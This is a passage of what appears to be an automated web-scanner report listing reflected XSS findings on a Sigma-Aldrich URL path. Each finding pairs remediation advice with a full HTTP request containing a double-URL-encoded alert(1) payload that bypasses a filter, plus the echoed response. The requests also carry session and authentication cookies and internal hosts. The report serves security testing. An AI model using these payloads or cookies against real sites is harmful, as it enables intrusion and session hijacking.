Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5190%2522%253balert%25281%2529%252f%252f5d79623930a was submitted in the REST URL parameter 1. This input was echoed as b5190";alert(1)//5d79623930a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcb5190%2522%253balert%25281%2529%252f%252f5d79623930a/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:55 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcb5190";alert(1)//5d79623930a/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.304. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2735b%2522%253balert%25281%2529%252f%252f129d946f346 was submitted in the REST URL parameter 2. This input was echoed as 2735b";alert(1)//129d946f346 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib2735b%2522%253balert%25281%2529%252f%252f129d946f346/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:02 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib2735b";alert(1)//129d946f346/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.305. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 555c4%2522%253balert%25281%2529%252f%252fa9d6c55d4af was submitted in the REST URL parameter 3. This input was echoed as 555c4";alert(1)//a9d6c55d4af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs555c4%2522%253balert%25281%2529%252f%252fa9d6c55d4af/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:07 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs555c4";alert(1)//a9d6c55d4af/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.306. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b0f%2522%253balert%25281%2529%252f%252f9cc5826e82d was submitted in the REST URL parameter 4. This input was echoed as 26b0f";alert(1)//9cc5826e82d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma26b0f%2522%253balert%25281%2529%252f%252f9cc5826e82d/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:12 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma26b0f";alert(1)//9cc5826e82d/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.307. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a38d9%2522%253balert%25281%2529%252f%252ffa6950811f0 was submitted in the REST URL parameter 5. This input was echoed as a38d9";alert(1)//fa6950811f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Informationa38d9%2522%253balert%25281%2529%252f%252ffa6950811f0/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:19 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Informationa38d9";alert(1)//fa6950811f0/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.308. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

